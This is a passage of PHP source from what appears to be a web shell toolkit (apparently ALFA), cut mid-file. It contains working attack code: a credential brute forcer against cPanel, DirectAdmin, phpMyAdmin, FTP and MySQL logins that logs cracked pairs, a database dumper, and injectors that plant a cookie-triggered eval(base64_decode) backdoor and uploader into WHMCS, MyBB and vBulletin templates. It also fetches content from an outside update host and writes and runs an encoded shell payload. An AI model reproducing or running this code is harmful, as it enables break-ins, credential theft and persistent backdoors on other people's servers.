  1636. $table_count = mysqli_fetch_row($table_count_q);
  1637. $data[$row["table_name"]]["data_count"] = $table_count[0];
  1638. $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");
  1639. while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
  1640. $data[$row["table_name"]]["cols"][] = $row2["column_name"];
  1641. }
  1642. }
  1643. mysqli_close($db);
  1644. echo '<ul id="myUL">';
  1645. foreach($data as $tbl => $cols){
  1646. echo '<li><span style="color:#00FF00;" class="box">'.$tbl.' ('.$cols["data_count"].')</span><ul class="nested">';
  1647. foreach($cols["cols"] as $col){
  1648. echo '<li tbl="'.$tbl.'"><span style="color:#00FF00;" tbl="'.$tbl.'" class="box sub-box">' . $col . '</span></li>';
  1649. }
  1650. echo '</ul></li>';
  1651. }
  1652. echo '</ul>';
  1653. }else{
  1654. echo('<center>mysqli_connect : Error!</center>');
  1655. }
  1656. }
  1657. echo('</div>');
  1658. alfafooter();
  1659. }
  1660. function alfaDumper(){
  1661. alfahead();
  1662. echo('<div class="header">');
  1663. AlfaNum(8,9,10);
  1664. echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
  1665. $table = array('td1' =>
  1666. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  1667. 'td2' =>
  1668. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  1669. 'td3' =>
  1670. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  1671. 'td4' =>
  1672. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  1673. 'td5' =>
  1674. array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
  1675. );
  1676. create_table($table);
  1677. echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
  1678. $username = ($_POST['alfa3']);
  1679. $password = ($_POST['alfa4']);
  1680. $dbname = ($_POST['alfa5']);
  1681. $dfile = ($_POST['alfa6']);
  1682. $host = ($_POST['alfa7']);
  1683. if(!empty($dbname)){
  1684. echo __pre();
  1685. $msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
  1686. if(@mysqli_connect($host,$username,$password,$dbname)){
  1687. if(strlen(alfaEx("mysqldump"))>0){
  1688. alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
  1689. echo($msg);
  1690. }else{
  1691. __alert("Error...!");
  1692. }
  1693. }else{
  1694. echo('<center>mysqli_connect : Error!</center>');
  1695. }
  1696. }
  1697. echo('</div>');
  1698. alfafooter();
  1699. }
  1700. function Alfa_DirectAdmin_Cracker($info){
  1701. if(!$info['mysql'])
  1702. $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
  1703. else $url = $info['protocol'].$info['target'].'/phpmyadmin';
  1704. $curl = curl_init();
  1705. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  1706. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  1707. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  1708. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  1709. curl_setopt($curl, CURLOPT_HEADER,0);
  1710. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1711. curl_setopt($curl, CURLOPT_URL,$url);
  1712. curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
  1713. if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  1714. $result = @curl_exec($curl);
  1715. $curl_errno = curl_errno($curl);
  1716. $curl_error = curl_error($curl);
  1717. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  1718. elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
  1719. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  1720. $info['target'] = $url;
  1721. CrackerResualt($info);
  1722. }
  1723. curl_close($curl);
  1724. }
  1725. function Alfa_CP_Cracker($info){
  1726. $url = $info['protocol'].$info['target'].':'.$info['port'];
  1727. $curl = curl_init();
  1728. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  1729. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  1730. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  1731. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  1732. curl_setopt($curl, CURLOPT_HEADER,0);
  1733. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
  1734. curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
  1735. curl_setopt($curl, CURLOPT_URL, $url);
  1736. $result = @curl_exec($curl);
  1737. $curl_errno = curl_errno($curl);
  1738. $curl_error = curl_error($curl);
  1739. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  1740. elseif(preg_match('/filemanager/i',$result)){
  1741. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  1742. $info['target'] = $url;
  1743. CrackerResualt($info);
  1744. }
  1745. curl_close($curl);
  1746. }
  1747. function Alfa_FTP_Cracker($info){
  1748. $url = $info['protocol'].$info['target'];
  1749. $curl = curl_init();
  1750. curl_setopt($curl, CURLOPT_URL, $url);
  1751. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  1752. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1753. curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
  1754. $result = @curl_exec($curl);
  1755. $curl_errno = curl_errno($curl);
  1756. $curl_error = curl_error($curl);
  1757. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  1758. elseif(preg_match('/(\d+):(\d+)/i',$result)){
  1759. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  1760. $info['target'] = $url;
  1761. CrackerResualt($info);
  1762. }
  1763. curl_close($curl);
  1764. }
  1765. function Alfa_Mysql_Cracker($info){
  1766. if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
  1767. CrackerResualt($info);
  1768. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  1769. }
  1770. }
  1771. function Alfa_FTPC($info){
  1772. if($con=@ftp_connect($info['target'],$info['port'])){
  1773. if($con){
  1774. $login=@ftp_login($con,$info['username'],$info['password']);
  1775. if($login){CrackerResualt($info);}}}
  1776. @ftp_close($con);
  1777. }
  1778. function CrackerResualt($info){
  1779. $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
  1780. $c = @fopen($info['fcrack'],'a+');
  1781. @fwrite($c, $res);
  1782. @fclose($c);
  1783. }
  1784. function Alfa_Call_Function_Cracker($method,$info){
  1785. switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
  1786. }
  1787. function alfaCrackers(){
  1788. alfahead();
  1789. AlfaNum(9,10);
  1790. echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
  1791. foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
  1792. echo '</select> Protocol: <select id="protocol" name="protocol">';
  1793. foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
  1794. echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
  1795. Port: <input id="port" type="text" name="port" value="2083">
  1796. <table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
  1797. <textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
  1798. &nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
  1799. Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
  1800. <p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
  1801. $target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
  1802. $port = $_POST['alfa2'];
  1803. $usernames= $_POST['alfa3'];
  1804. $passwords = $_POST['alfa4'];
  1805. $fcrack = $_POST['alfa5'];
  1806. $cracking = $_POST['alfa6'];
  1807. $protocol = $_POST['alfa7'];
  1808. $loginpanel = $_POST['alfa8'];
  1809. $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
  1810. if($cracking=='start'){
  1811. echo __pre();
  1812. $exuser = explode("\n",$usernames);
  1813. $expw = explode("\n",$passwords);
  1814. foreach($exuser as $user){
  1815. foreach($expw as $pw){
  1816. $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
  1817. Alfa_Call_Function_Cracker($loginpanel,$array);
  1818. }
  1819. }
  1820. echo '<br><font color="red">Attack Finished...</font>';
  1821. }
  1822. echo '</div>';
  1823. alfafooter();
  1824. }
  1825. function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
  1826. function alfaShellInjectors(){
  1827. alfahead();
  1828. echo '<div class=header>';
  1829. AlfaNum(11);
  1830. echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
  1831. $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
  1832. if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
  1833. AlfaNum();
  1834. echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";$table = array('td1' =>
  1835. array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  1836. 'td2' =>
  1837. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  1838. 'td3' =>
  1839. array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  1840. 'td4' =>
  1841. array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  1842. 'td5' =>
  1843. array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  1844. );
  1845. create_table($table);
  1846. echo $selector;
  1847. echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
  1848. if(isset($_POST['alfa6'])) {
  1849. $dbu = $_POST['alfa6'];
  1850. $dbn = $_POST['alfa7'];
  1851. $dbp = $_POST['alfa8'];
  1852. $dbh = $_POST['alfa9'];
  1853. $path = $_POST['alfa10'];
  1854. $method = $_POST['alfa4'];
  1855. $index = "{php}".ALFA_UPLOADER.";{/php}";
  1856. $newin = str_replace("'","\'",$index);
  1857. $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
  1858. if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
  1859. if(filter_var($path,FILTER_VALIDATE_URL)){
  1860. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
  1861. $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  1862. $soleGet = mysqli_fetch_assoc($soleSave);
  1863. $tempSave1 = $soleGet['message'];
  1864. $tempSave = str_replace("'","\'",$tempSave1);
  1865. mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
  1866. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
  1867. $result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
  1868. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  1869. $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
  1870. if(function_exists('curl_version') && $method == 'auto'){
  1871. $AlfaSole = new AlfaCURL(true);
  1872. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  1873. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  1874. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  1875. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  1876. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  1877. __alert("shell injectet...");
  1878. $ff= 'http://'.$path."/solevisible.php";
  1879. output($ff);}else{
  1880. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
  1881. }if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
  1882. AlfaNum(1,2,3,5);
  1883. echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
  1884. ";
  1885. $table = array('td1' =>
  1886. array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  1887. 'td2' =>
  1888. array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
  1889. 'td3' =>
  1890. array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
  1891. 'td4' =>
  1892. array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  1893. 'td5' =>
  1894. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
  1895. );
  1896. create_table($table);
  1897. echo $selector;
  1898. echo "<p><input type=submit value=' '></p></form></center></center>";
  1899. if(isset($_POST['alfa6'])) {
  1900. $dbu = $_POST['alfa6'];
  1901. $dbn = $_POST['alfa7'];
  1902. $dbp = $_POST['alfa8'];
  1903. $dbh = $_POST['alfa9'];
  1904. $prefix = $_POST['alfa10'];
  1905. $method = $_POST['alfa4'];
  1906. $shellCode = "{\${".ALFA_UPLOADER."}}";
  1907. $newinshell = str_replace("'","\'",$shellCode);
  1908. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
  1909. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  1910. $inject = "select template from {$prefix}templates where title= 'calendar'";
  1911. $result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
  1912. $GetTemp = mysqli_fetch_assoc($result);
  1913. $saveDate = $GetTemp['template'];
  1914. $repsave = str_replace($shellCode,"",$saveDate);
  1915. $repsave = str_replace("'","\'",$repsave);
  1916. $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
  1917. $result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
  1918. $geturl = "select value from {$prefix}settings where name= 'bburl'";
  1919. $findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
  1920. $rowb = mysqli_fetch_assoc($findurl);
  1921. $furl = $rowb['value'];
  1922. $realurl = parse_url($furl,PHP_URL_HOST);
  1923. $realpath = parse_url($furl,PHP_URL_PATH);
  1924. $res = false;
  1925. $AlfaCurl = new AlfaCURL();
  1926. if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
  1927. if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  1928. @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
  1929. @fputs($fsock, "HOST: $realurl\r\n");
  1930. @fputs($fsock, "Connection: close\r\n\r\n");
  1931. $check = fgets($fsock);
  1932. if(preg_match("/200 OK/i",$check)){
  1933. $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
  1934. $clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
  1935. @fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
  1936. $AlfaCurl->Send($realurl.$realpath."/calendar.php");
  1937. $res = true;
  1938. }
  1939. if($res){
  1940. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  1941. output($ff);
  1942. }else{
  1943. $ff = 'http://'.$realurl.$realpath."/calendar.php";
  1944. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  1945. echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
  1946. }}}}
  1947. if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
  1948. AlfaNum(1,2,7,9,10);
  1949. echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
  1950. $table = array('td1' =>
  1951. array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  1952. 'td2' =>
  1953. array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
  1954. 'td3' =>
  1955. array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
  1956. 'td4' =>
  1957. array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
  1958. 'td5' =>
  1959. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
  1960. );
  1961. create_table($table);
  1962. echo $selector;
  1963. echo '<p><input type="submit" value=" " /></p></form></center>';
  1964. if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
  1965. $method = $_POST['alfa8'];
  1966. $faq_name = "faq";
  1967. $faq_file = "/faq.php";
  1968. $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
  1969. $conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());
  1970. $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
  1971. $recivedata = @mysqli_query($conn,$rec);
  1972. $getd = @mysqli_fetch_assoc($recivedata);
  1973. $savetoass = $getd['template'];
  1974. if(empty($savetoass)){
  1975. $faq_name = "header";
  1976. $faq_file = "/";
  1977. $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
  1978. $recivedata = @mysqli_query($conn,$rec);
  1979. $getd = @mysqli_fetch_assoc($recivedata);
  1980. $savetoass = $getd['template'];
  1981. $code = ALFA_UPLOADER.";";
  1982. }
  1983. $code = str_replace("'","\'",$code);
  1984. $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
  1985. $ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
  1986. $geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
  1987. $getval = @mysqli_fetch_assoc($geturl);
  1988. $saveval = $getval['value'];
  1989. if($faq_name == "header"){
  1990. if(substr($saveval, -5, 5) == "/core"){
  1991. $saveval = substr($saveval, 0, -5);
  1992. }
  1993. }
  1994. $realurl = parse_url($saveval,PHP_URL_HOST);
  1995. $realpath = parse_url($saveval,PHP_URL_PATH);
  1996. $res = false;
  1997. $AlfaCurl = new AlfaCURL();
  1998. if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
  1999. if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  2000. @fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
  2001. @fputs($fsock, "HOST: $realurl\r\n");
  2002. @fputs($fsock, "Connection: close\r\n\r\n");
  2003. $check = fgets($fsock);
  2004. if(preg_match("/200 OK/i",$check)){
  2005. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
  2006. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2007. $res = true;
  2008. }
  2009. @fclose($fsock);
  2010. }
  2011. }elseif(function_exists('curl_version') && $method == 'auto'){
  2012. $AlfaCurl->Send($realurl.$realpath.$faq_file);
  2013. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
  2014. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2015. $res = true;
  2016. }
  2017. if($res){
  2018. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  2019. output($ff);
  2020. }else{
  2021. $ff = 'http://'.$realurl.$realpath.$faq_file;
  2022. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  2023. echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
  2024. echo '</div>';
  2025. alfafooter();
  2026. }
  2027. function alfacheckfiletype(){
  2028. $path = $_POST['path'];
  2029. $arg = $_POST['arg'];
  2030. if(@is_file($path.'/'.$arg)){
  2031. echo("file");
  2032. }else{
  2033. echo("dir");
  2034. }
  2035. }
  2036. function alfacheckupdate(){
  2037. if($GLOBALS["DB_NAME"]["cgi_api"]){
  2038. if(!isset($_COOKIE["haxorcgiapi_mode"])&&!isset($_COOKIE["haxorcgiapi"])){
  2039. _alfa_cgicmd("whoami","perl",true);
  2040. if(strlen(alfaEx("whoami",false,true))>0){
  2041. __alfa_set_cookie("alfa_canruncmd", "true");
  2042. }
  2043. }
  2044. }
  2045. if(function_exists("curl_version")){
  2046. $update = new AlfaCURL();
  2047. $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);
  2048. $json = @json_decode($json,true);
  2049. $data = array();
  2050. if($json){
  2051. if(!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])){
  2052. if($json["type"] == "update"){
  2053. if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){
  2054. @setcookie("alfa_checkupdate", "1", time()+86400);
  2055. $data["content"] = '<div class="update-holder">'.$json["content"].'</div>';
  2056. }
  2057. }
  2058. }
  2059. if(isset($json["ads"]) && !empty($json["ads"])){
  2060. $data["content"] .= $json["ads"];
  2061. }
  2062. if(isset($json["copyright"]) && !empty($json["copyright"])){
  2063. $data["copyright"] = $json["copyright"];
  2064. }
  2065. if(isset($json["solevisible"]) && !empty($json["solevisible"])){
  2066. $data["solevisible"] = $json["solevisible"];
  2067. }
  2068. if(isset($json["code_name"]) && !empty($json["code_name"])){
  2069. $data["code_name"] = $json["code_name"];
  2070. $data["version_number"] = __ALFA_VERSION__;
  2071. }
  2072. if(isset($json["market"]) && !empty($json["market"])){
  2073. $data["market"] = $json["market"];
  2074. }
  2075. echo @json_encode($data);
  2076. }
  2077. }
  2078. }
  2079. function alfaWriteTocgiapi($name, $source){
  2080. $temp = "";
  2081. $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
  2082. if(in_array($name, $not_api)){
  2083. $temp = ALFA_TEMPDIR;
  2084. if($temp){
  2085. @chdir($temp);
  2086. }
  2087. }else{
  2088. alfaCreateParentFolder();
  2089. @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
  2090. }
  2091. @mkdir('haxorcgiapi',0755);
  2092. __write_file("haxorcgiapi/".$name, __get_resource($source));
  2093. @chmod("haxorcgiapi/".$name, 0755);
  2094. return $temp;
  2095. }
  2096. function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
  2097. function alfaupdateheader(){
  2098. if(!isset($_COOKIE["updateheader_data"])){
  2099. $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
  2100. $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
  2101. $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);
  2102. $data = alfaEx("cd '{$tmp_path}/haxorcgiapi';sh getheader.haxor",false,true,true);
  2103. if(@is_array(@json_decode($data,true))){
